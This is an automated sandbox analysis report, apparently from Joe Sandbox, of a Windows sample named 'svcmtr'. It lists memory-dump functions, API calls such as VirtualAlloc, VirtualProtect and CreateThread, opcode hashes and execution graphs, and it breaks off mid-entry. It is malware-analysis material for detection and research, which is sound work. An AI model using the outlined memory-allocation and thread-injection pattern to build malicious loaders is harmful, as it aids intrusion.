                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 392fec7977bcdf7483cd8ab5539ebc7518d6027962b5e4dc8ab5698ccb8e65b3
                                                                                                                            • Instruction ID: 5e1d212f51ab32ea981ca59fe708d56ef9b1507cad56df469f14c18ab83994ab
                                                                                                                            • Opcode Fuzzy Hash: 392fec7977bcdf7483cd8ab5539ebc7518d6027962b5e4dc8ab5698ccb8e65b3
                                                                                                                            • Instruction Fuzzy Hash: E1317F71D3023A9EDF1D5A60CC61FFD7632FB907C0FA88269D907A6141DBB04E709A90
                                                                                                                            Function 002B1E0F Relevance: 1.3, APIs: 1, Instructions: 58memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNELBASE(?,998B1F24), ref: 002B1E3C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: c0a395b92c7622aa0072517d91f8368763480b3ead5ee4e137e84abe63479980
                                                                                                                            • Instruction ID: ad4c70635be429ddfc3eb1350ce4c63eaf03333e36cde1a52e2a9742b78d8832
                                                                                                                            • Opcode Fuzzy Hash: c0a395b92c7622aa0072517d91f8368763480b3ead5ee4e137e84abe63479980
                                                                                                                            • Instruction Fuzzy Hash: EE012B31D3012A9ADF294A24CC69FFD7671FB90740F588259D84BE5042DB704A71CE80
                                                                                                                            Function 002B1E3A Relevance: 1.3, APIs: 1, Instructions: 46memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNELBASE(?,998B1F24), ref: 002B1E3C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000C.00000002.387287750.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_12_2_2b0000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: 08e26be0281c58e79243e2467a313d593d9ccbba344c01e2e43d6f34c7825df8
                                                                                                                            • Instruction ID: d24294e354cf50e0e1ff5a61fb9a1d7444515576e9a652d1367347c40228d6a7
                                                                                                                            • Opcode Fuzzy Hash: 08e26be0281c58e79243e2467a313d593d9ccbba344c01e2e43d6f34c7825df8
                                                                                                                            • Instruction Fuzzy Hash: 4C01F471D3012A9AEF294E30CC69FFE7635FB90784F548299D94AE2041EB304E72CE80

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:5.5%
                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:317
                                                                                                                            Total number of Limit Nodes:4
                                                                                                                            execution_graph 5597 232122 5598 232124 CreateThread 5597->5598 5599 232130 5598->5599 5600 23216c RtlExitUserThread 5599->5600 5601 23215a 5600->5601 5602 2321d8 RtlExitUserThread 5601->5602 5603 2321e4 5602->5603 5785 2307a2 5786 2307b4 5785->5786 5787 2307ce 5786->5787 5788 2307d9 2 API calls 5786->5788 5789 2308bd 2 API calls 5787->5789 5788->5787 5790 23089c 5789->5790 5616 23082b 5617 230846 5616->5617 5620 2308bd 5617->5620 5619 23089c 5625 2308ce 5620->5625 5622 2308c2 EnumWindows 5624 230946 5622->5624 5624->5619 5626 2308eb 5625->5626 5627 23093a EnumWindows 5626->5627 5628 230946 5627->5628 5628->5622 5795 2321ab 5796 2321c6 5795->5796 5797 2321d8 RtlExitUserThread 5796->5797 5798 2321e4 5797->5798 5803 231fa9 5804 231fb3 5803->5804 5805 2320b8 3 API calls 5804->5805 5808 2320ab 5805->5808 5806 232124 CreateThread 5807 232130 5806->5807 5809 23216c RtlExitUserThread 5807->5809 5808->5806 5810 23215a 5809->5810 5811 2321d8 RtlExitUserThread 5810->5811 5812 2321e4 5811->5812 5633 231f30 5634 231f41 5633->5634 5636 231f5e 5633->5636 5635 231f6a 5 API calls 5634->5635 5634->5636 5635->5636 5637 2320b8 3 API calls 5636->5637 5640 2320ab 5637->5640 5638 232124 CreateThread 5639 232130 5638->5639 5641 23216c RtlExitUserThread 5639->5641 5640->5638 5642 23215a 5641->5642 5643 2321d8 RtlExitUserThread 5642->5643 5644 2321e4 5643->5644 5490 231b34 5491 231b4f 5490->5491 5492 231b61 VirtualProtect 5491->5492 5493 231b6d 5492->5493 5494 232148 5493->5494 5497 231c6c 5493->5497 5495 23216c RtlExitUserThread 5494->5495 5496 23215a 5495->5496 5500 2321d8 RtlExitUserThread 5496->5500 5502 231dd0 5497->5502 5501 2321e4 5500->5501 5503 231ded 5502->5503 5504 231e3c VirtualAlloc 5503->5504 5505 231e48 5504->5505 5519 231ebb 5505->5519 5507 231eb4 5510 231f5e 5511 2320b8 3 API calls 5510->5511 5514 2320ab 5511->5514 5512 232124 CreateThread 5513 232130 5512->5513 5515 23216c RtlExitUserThread 5513->5515 5514->5512 5516 23215a 5515->5516 5517 2321d8 RtlExitUserThread 5516->5517 5518 231dc3 5517->5518 5520 231ed8 5519->5520 5521 231f4f 5520->5521 5524 231fe3 5520->5524 5522 231f6a 5 API calls 5521->5522 5523 231f5e 5522->5523 5523->5524 5525 2320b8 3 API calls 5524->5525 5528 2320ab 5525->5528 5526 232124 CreateThread 5527 232130 5526->5527 5529 23216c RtlExitUserThread 5527->5529 5528->5526 5530 23215a 5529->5530 5531 2321d8 RtlExitUserThread 5530->5531 5532 231ea7 5531->5532 5532->5507 5532->5510 5533 231f6a 5532->5533 5534 231f87 5533->5534 5535 2320b8 3 API calls 5534->5535 5538 2320ab 5535->5538 5536 232124 CreateThread 5537 232130 5536->5537 5539 23216c RtlExitUserThread 5537->5539 5538->5536 5540 23215a 5539->5540 5541 2321d8 RtlExitUserThread 5540->5541 5542 2321e4 5541->5542 5542->5510 5543 2313bb 5544 2313d6 5543->5544 5545 2313e8 VirtualProtect 5544->5545 5546 2313f4 5545->5546 5547 231e3a 5548 231e3c VirtualAlloc 5547->5548 5549 231e48 5548->5549 5550 231ebb 7 API calls 5549->5550 5551 231ea7 5550->5551 5552 231eb4 5551->5552 5553 231f4f 5551->5553 5556 231fe3 5551->5556 5554 231f6a 5 API calls 5553->5554 5555 231f5e 5554->5555 5555->5556 5557 2320b8 3 API calls 5556->5557 5560 2320ab 5557->5560 5558 232124 CreateThread 5559 232130 5558->5559 5561 23216c RtlExitUserThread 5559->5561 5560->5558 5562 23215a 5561->5562 5563 2321d8 RtlExitUserThread 5562->5563 5564 2321e4 5563->5564 5565 231639 5566 231654 5565->5566 5567 231666 VirtualProtect 5566->5567 5569 231672 5567->5569 5568 231797 VirtualProtect 5568->5569 5569->5568 5570 2317d6 5569->5570 5571 230938 5572 23093a EnumWindows 5571->5572 5573 230946 5572->5573 5574 23203d 5575 23203e 5574->5575 5576 2320b8 3 API calls 5575->5576 5578 2320ab 5576->5578 5577 232124 CreateThread 5579 232130 5577->5579 5578->5577 5580 23216c RtlExitUserThread 5579->5580 5581 23215a 5580->5581 5582 2321d8 RtlExitUserThread 5581->5582 5583 2321e4 5582->5583 5645 230700 5646 23070d 5645->5646 5649 230a2b 5646->5649 5651 2307ce 5646->5651 5652 2307d9 5646->5652 5648 2308bd 2 API calls 5650 23089c 5648->5650 5651->5648 5657 2307ec 5652->5657 5654 2307df 5655 2308bd 2 API calls 5654->5655 5656 23089c 5655->5656 5656->5651 5658 230809 5657->5658 5659 2308bd 2 API calls 5658->5659 5660 23089c 5659->5660 5660->5654 5832 23068b 5833 2306a8 5832->5833 5841 230716 5833->5841 5835 230709 5836 2307d9 2 API calls 5835->5836 5838 230a2b 5835->5838 5840 2307ce 5835->5840 5836->5840 5837 2308bd 2 API calls 5839 23089c 5837->5839 5840->5837 5842 230733 5841->5842 5843 2307d9 2 API calls 5842->5843 5845 230a2b 5842->5845 5847 2307ce 5842->5847 5843->5847 5844 2308bd 2 API calls 5846 23089c 5844->5846 5845->5835 5846->5835 5847->5844 5848 23078b 5849 23079c 5848->5849 5852 230a2b 5848->5852 5850 2307d9 2 API calls 5849->5850 5854 2307ce 5849->5854 5850->5854 5851 2308bd 2 API calls 5853 23089c 5851->5853 5854->5851 5661 231e0f 5662 231e2a 5661->5662 5663 231e3c VirtualAlloc 5662->5663 5664 231e48 5663->5664 5665 231ebb 7 API calls 5664->5665 5667 231ea7 5665->5667 5666 231eb4 5667->5666 5668 231f6a 5 API calls 5667->5668 5669 231f5e 5667->5669 5668->5669 5670 2320b8 3 API calls 5669->5670 5673 2320ab 5670->5673 5671 232124 CreateThread 5672 232130 5671->5672 5674 23216c RtlExitUserThread 5672->5674 5673->5671 5675 23215a 5674->5675 5676 2321d8 RtlExitUserThread 5675->5676 5677 2321e4 5676->5677 5678 23090d 5679 230928 5678->5679 5680 23093a EnumWindows 5679->5680 5681 230946 5680->5681 5682 231013 5683 231030 5682->5683 5684 23107f LoadLibraryA 5683->5684 5685 23108b 5684->5685 5700 231c65 5701 231c77 5700->5701 5702 231dd0 10 API calls 5701->5702 5703 231dc3 5702->5703 5704 23176a 5707 2316ad 5704->5707 5705 231797 VirtualProtect 5705->5707 5706 2317d6 5707->5705 5707->5706 5708 231b6a 5709 231b79 5708->5709 5710 232148 5709->5710 5712 231c6c 5709->5712 5711 23216c RtlExitUserThread 5710->5711 5713 23215a 5711->5713 5714 231dd0 10 API calls 5712->5714 5716 2321d8 RtlExitUserThread 5713->5716 5715 231dc3 5714->5715 5717 2321e4 5716->5717 5465 231ff0 5466 231ff2 5465->5466 5475 2320b8 5466->5475 5468 232124 CreateThread 5469 232130 5468->5469 5483 23216c 5469->5483 5470 2320ab 5470->5468 5472 23215a 5473 2321d8 RtlExitUserThread 5472->5473 5474 2321e4 5473->5474 5476 2320d5 5475->5476 5477 232124 CreateThread 5476->5477 5478 232130 5477->5478 5479 23216c RtlExitUserThread 5478->5479 5480 23215a 5479->5480 5481 2321d8 RtlExitUserThread 5480->5481 5482 2321e4 5481->5482 5482->5470 5484 232189 5483->5484 5485 2321d8 RtlExitUserThread 5484->5485 5486 2321e4 5485->5486 5486->5472 5883 2320f7 5884 232112 5883->5884 5885 232124 CreateThread 5884->5885 5886 232130 5885->5886 5887 23216c RtlExitUserThread 5886->5887 5888 23215a 5887->5888 5889 2321d8 RtlExitUserThread 5888->5889 5890 2321e4 5889->5890 5891 231af5 5892 231b12 5891->5892 5893 231b61 VirtualProtect 5892->5893 5894 231b6d 5893->5894 5895 232148 5894->5895 5897 231c6c 5894->5897 5896 23216c RtlExitUserThread 5895->5896 5898 23215a 5896->5898 5899 231dd0 10 API calls 5897->5899 5901 2321d8 RtlExitUserThread 5898->5901 5900 231dc3 5899->5900 5902 2321e4 5901->5902 5912 231efa 5913 231f15 5912->5913 5914 231f6a 5 API calls 5913->5914 5915 231f5e 5913->5915 5914->5915 5916 2320b8 3 API calls 5915->5916 5918 2320ab 5916->5918 5917 232124 CreateThread 5919 232130 5917->5919 5918->5917 5920 23216c RtlExitUserThread 5919->5920 5921 23215a 5920->5921 5922 2321d8 RtlExitUserThread 5921->5922 5923 2321e4 5922->5923 5924 2315fa 5925 231617 5924->5925 5926 231666 VirtualProtect 5925->5926 5927 231672 5926->5927 5928 231797 VirtualProtect 5927->5928 5929 2317d6 5927->5929 5928->5927 5584 23107d 5585 23107f LoadLibraryA 5584->5585 5586 23108b 5585->5586 5726 23137c 5727 231399 5726->5727 5728 2313e8 VirtualProtect 5727->5728 5729 2313f4 5728->5729 5930 2306ca 5931 2306e5 5930->5931 5932 230716 2 API calls 5931->5932 5933 230709 5932->5933 5934 2307d9 2 API calls 5933->5934 5936 230a2b 5933->5936 5938 2307ce 5933->5938 5934->5938 5935 2308bd 2 API calls 5937 23089c 5935->5937 5938->5935 5487 2321d6 5488 2321d8 RtlExitUserThread 5487->5488 5489 2321e4 5488->5489 5748 230856 5749 230858 5748->5749 5750 2308bd 2 API calls 5749->5750 5751 23089c 5750->5751 5752 230755 5753 230770 5752->5753 5754 2307d9 2 API calls 5753->5754 5756 230a2b 5753->5756 5758 2307ce 5753->5758 5754->5758 5755 2308bd 2 API calls 5757 23089c 5755->5757 5758->5755 5769 231f58 5770 231f59 5769->5770 5771 231f6a 5 API calls 5770->5771 5772 231f5e 5771->5772 5773 2320b8 3 API calls 5772->5773 5776 2320ab 5773->5776 5774 232124 CreateThread 5775 232130 5774->5775 5777 23216c RtlExitUserThread 5775->5777 5776->5774 5778 23215a 5777->5778 5779 2321d8 RtlExitUserThread 5778->5779 5780 2321e4 5779->5780

                                                                                                                            Executed Functions

                                                                                                                            Function 00231AF5 Relevance: 3.3, APIs: 2, Instructions: 283memorythreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNELBASE(?,?,26417AC6), ref: 00231B61
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002321D8
                                                                                                                              • Part of subcall function 00231DD0: VirtualAlloc.KERNELBASE(?,998B1F24), ref: 00231E3C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$AllocExitProtectThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2339163276-0
                                                                                                                            • Opcode ID: 1d338c59a85754a57e57f96408806357cb45cbd025ef408088fc94aa2307c2d1
                                                                                                                            • Instruction ID: 32211ed43804c9c2024fb423d83f40c87190245b08f71caeb1ba956bcd53cb85
                                                                                                                            • Opcode Fuzzy Hash: 1d338c59a85754a57e57f96408806357cb45cbd025ef408088fc94aa2307c2d1
                                                                                                                            • Instruction Fuzzy Hash: E0916CF2E34729CFEB19CA64CC917BDB272FBC1300F19966AC107AB145DAF459658E40
                                                                                                                            Function 00231B34 Relevance: 1.7, APIs: 1, Instructions: 192memorythreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNELBASE(?,?,26417AC6), ref: 00231B61
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002321D8
                                                                                                                              • Part of subcall function 00231DD0: VirtualAlloc.KERNELBASE(?,998B1F24), ref: 00231E3C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$AllocExitProtectThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2339163276-0
                                                                                                                            • Opcode ID: eeecd8ac049aa3eeb4b77f0e56db14689fd2e68504fb283cb04641ebfd057cb7
                                                                                                                            • Instruction ID: d34ac70a124d5ab01515cd46ee62588fb34addd97495f0f1b6d5c9fc03f0b873
                                                                                                                            • Opcode Fuzzy Hash: eeecd8ac049aa3eeb4b77f0e56db14689fd2e68504fb283cb04641ebfd057cb7
                                                                                                                            • Instruction Fuzzy Hash: 8661E9B2E34728CFDB19CE64CC817ADF772BF85304F1586AAC006AB254DBB059659F81
                                                                                                                            Function 0023137C Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 171memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 103 23137c-23148f call 230af8 * 2 call 230c47 VirtualProtect 116 231491-2314a4 103->116 117 2314a9-2314f1 103->117 116->117 120 2314f7-231559 117->120 124 23155b-231561 120->124
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNELBASE(?,?), ref: 002313E8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: *$0$>
                                                                                                                            • API String ID: 544645111-1994514764
                                                                                                                            • Opcode ID: 67e91eaf6511cbb0b454f96bb40ffb87ec0ac4c2cf8711cdeed14c2a3f89dabb
                                                                                                                            • Instruction ID: b20c1959161d0f1f9c531eb60a5189586cdbcece0d3637516fb23815953db608
                                                                                                                            • Opcode Fuzzy Hash: 67e91eaf6511cbb0b454f96bb40ffb87ec0ac4c2cf8711cdeed14c2a3f89dabb
                                                                                                                            • Instruction Fuzzy Hash: C951E777E201249FEF0CCF69DC91ABCB7A2FBD4310F1A9129D506EF691DA7899108650
                                                                                                                            Function 00231639 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 186 231639-2316aa call 230c47 VirtualProtect 196 2316ad-231724 call 230eb7 call 23172b 186->196 205 231726-231792 call 230af8 * 2 call 230c47 196->205 206 231795-231796 196->206 208 231797-23179e VirtualProtect 205->208 206->208 209 2317a3-2317d0 208->209 209->196 219 2317d6-2317e4 209->219
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNELBASE(?,?), ref: 00231666
                                                                                                                              • Part of subcall function 0023172B: VirtualProtect.KERNELBASE(?,?,?,?), ref: 00231797
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: /$;
                                                                                                                            • API String ID: 544645111-2360594509
                                                                                                                            • Opcode ID: 10b6dff0dc5a8fdf983ee27d7db3e209437fd1f8d0a4512bde890e7057a9382f
                                                                                                                            • Instruction ID: 60459ea788514fb387b3a35e0d280d9ae4b321a29c886091a4ac0bfa301d5fbb
                                                                                                                            • Opcode Fuzzy Hash: 10b6dff0dc5a8fdf983ee27d7db3e209437fd1f8d0a4512bde890e7057a9382f
                                                                                                                            • Instruction Fuzzy Hash: B0415EB3A341129BDB0C5BA8CD566BDB6A5EBD4301F2DD62DD003DA286DFBC44709A60
                                                                                                                            Function 00231EBB Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 278COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457
                                                                                                                            • Opcode ID: 22a14f89a05aac5094d3beed024d389ebe806773abddd533013f3921c93655df
                                                                                                                            • Instruction ID: 2becfb1312bca027ec711fc72dfe731846032c906d6c346913d924ad6d5e0069
                                                                                                                            • Opcode Fuzzy Hash: 22a14f89a05aac5094d3beed024d389ebe806773abddd533013f3921c93655df
                                                                                                                            • Instruction Fuzzy Hash: A37156FAA74722DAFB1C62B4CC66BBC2416EBE0711F68A52DA303D95D3CEEC44645910
                                                                                                                            Function 00231EFA Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 251COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 314 231efa-231f3b call 230c47 322 231fe3-2320ac call 2312ba call 230f8f call 231564 call 2320b8 314->322 323 231f41-231f49 314->323 361 232113 322->361 362 2320ae-2320af 322->362 323->322 325 231f4f-231f5f call 231f6a 323->325 333 231f61 325->333 334 231fca-231fd1 325->334 336 231fb3-231fc9 call 230c47 333->336 337 231f63 333->337 346 231fd6-231fe2 334->346 336->334 338 231f65-231fb2 call 230af8 * 2 337->338 339 231fd4-231fd5 337->339 338->336 339->346 346->322 364 232116-232119 361->364 363 2320b1-232119 call 230af8 * 2 call 230c47 362->363 362->364 366 23211d-2321f1 CreateThread call 23216c call 230af8 * 2 call 230c47 RtlExitUserThread 363->366 364->366
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457
                                                                                                                            • Opcode ID: 7a2d50deffb679e04c43d79dccdb1bf83c3a2446d70cb0eb78214827ec212f58
                                                                                                                            • Instruction ID: 1f2713b15d191a3e6ff4aa7b7b5bb86564c5ab67c13c1dd1677a4f5e2cf529fb
                                                                                                                            • Opcode Fuzzy Hash: 7a2d50deffb679e04c43d79dccdb1bf83c3a2446d70cb0eb78214827ec212f58
                                                                                                                            • Instruction Fuzzy Hash: D46188FAA30722DAFB1C52B4CC66BBC6456EBE0710F2CF52DA203D8593CEEC44649910
                                                                                                                            Function 00231F25 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 239COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 398 231f25-231f3b 402 231fe3-2320ac call 2312ba call 230f8f call 231564 call 2320b8 398->402 403 231f41-231f49 398->403 441 232113 402->441 442 2320ae-2320af 402->442 403->402 405 231f4f-231f5f call 231f6a 403->405 413 231f61 405->413 414 231fca-231fd1 405->414 416 231fb3-231fc9 call 230c47 413->416 417 231f63 413->417 426 231fd6-231fe2 414->426 416->414 418 231f65-231fb2 call 230af8 * 2 417->418 419 231fd4-231fd5 417->419 418->416 419->426 426->402 444 232116-232119 441->444 443 2320b1-232119 call 230af8 * 2 call 230c47 442->443 442->444 446 23211d-2321f1 CreateThread call 23216c call 230af8 * 2 call 230c47 RtlExitUserThread 443->446 444->446
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457
                                                                                                                            • Opcode ID: 761417fe31841237f05dc1249596a422ea29c60b576457c36bb18d40a5205923
                                                                                                                            • Instruction ID: 4c5889ccbfee01b959fb99ad92e9a9818881da2afc227050a63deb5dc84a1498
                                                                                                                            • Opcode Fuzzy Hash: 761417fe31841237f05dc1249596a422ea29c60b576457c36bb18d40a5205923
                                                                                                                            • Instruction Fuzzy Hash: B5518AFAA34722DAFB1C52B4CD56BBC2416E7E0710F28F52DA343D9593CEEC44689910
                                                                                                                            Function 00231013 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 233libraryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 478 231013-23109c call 230af8 * 2 call 230c47 LoadLibraryA 491 23109e-2310ab 478->491 492 2310ad-2310b8 478->492 494 2310ba-2310f7 491->494 492->494 499 23124e-231264 494->499 500 2310fd-231107 494->500 508 231266-231279 499->508 509 231299-2312a8 499->509 501 231127-231142 500->501 502 231109-231125 500->502 511 231147-231163 call 23116e 501->511 502->511 512 23127b-23127e 508->512 519 231165-2311d3 call 230af8 * 2 call 230c47 511->519 520 2311d4-2311f8 511->520 513 231280-231293 512->513 514 231295-231297 512->514 513->512 514->509 519->520 528 2311fa-231206 520->528 529 23123e-231249 520->529 532 231236-23123b 528->532 533 231208-231216 528->533 532->529 535 231218-23121b 533->535 537 23122d-231231 535->537 538 23121d-23122b 535->538 537->532 538->535
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID: j$l
                                                                                                                            • API String ID: 1029625771-267213617
                                                                                                                            • Opcode ID: 2791edf6c800f60ef0955ebe1f92a9428c0b75e805e56d5d4f0ccbfc677ce817
                                                                                                                            • Instruction ID: 7cbc2ba3af5a4e56bee967a37a3363aaa9e13873e80c38a29cd49190461c2271
                                                                                                                            • Opcode Fuzzy Hash: 2791edf6c800f60ef0955ebe1f92a9428c0b75e805e56d5d4f0ccbfc677ce817
                                                                                                                            • Instruction Fuzzy Hash: 0F6166F2B746528EEB0D8A68CCA17BD6696EBC0301F28D13DCA43DA1D5DEF844718A50
                                                                                                                            Function 00231F30 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 232COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 543 231f30-231f3b 544 231fe3-2320ac call 2312ba call 230f8f call 231564 call 2320b8 543->544 545 231f41-231f49 543->545 583 232113 544->583 584 2320ae-2320af 544->584 545->544 547 231f4f-231f5f call 231f6a 545->547 555 231f61 547->555 556 231fca-231fd1 547->556 558 231fb3-231fc9 call 230c47 555->558 559 231f63 555->559 568 231fd6-231fe2 556->568 558->556 560 231f65-231fb2 call 230af8 * 2 559->560 561 231fd4-231fd5 559->561 560->558 561->568 568->544 586 232116-232119 583->586 585 2320b1-232119 call 230af8 * 2 call 230c47 584->585 584->586 588 23211d-2321f1 CreateThread call 23216c call 230af8 * 2 call 230c47 RtlExitUserThread 585->588 586->588
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457
                                                                                                                            • Opcode ID: 2382ced00d76859903ea9042a21a7f610661b8b4512a8fd4f310670d91341f95
                                                                                                                            • Instruction ID: c166ac209fa431da22314d504f111604cd9e5dd1dcf0258f41aa6a2790330bca
                                                                                                                            • Opcode Fuzzy Hash: 2382ced00d76859903ea9042a21a7f610661b8b4512a8fd4f310670d91341f95
                                                                                                                            • Instruction Fuzzy Hash: 2B519CFAA34722DAFB1C52A4CD56BBC2516E7E0710F2CF52DA343D9587CEEC44689910
                                                                                                                            Function 00231F58 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 222COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.406406978.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457
                                                                                                                            • Opcode ID: 6a8ed87bcf0e59236ddbef0348ee125da03c90cd37ccd2b7c2bf74579bb87c8c
                                                                                                                            • Instruction ID: b4e4918b73231de077afd7453380209ab017ed3985eec5590f99093f13a64a07
                                                                                                                            • Opcode Fuzzy Hash: 6a8ed87bcf0e59236ddbef0348ee125da03c90cd37ccd2b7c2bf74579bb87c8c
                                                                                                                            • Instruction Fuzzy Hash: F451ACF6A34722DAFB1C52A4CD56BBC2512EBE0710F28E12DA343E9583CEEC44689910
                                                                                                                            Function 00231F6A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 214COMMON
                                                                                                                            Download Yara Rule

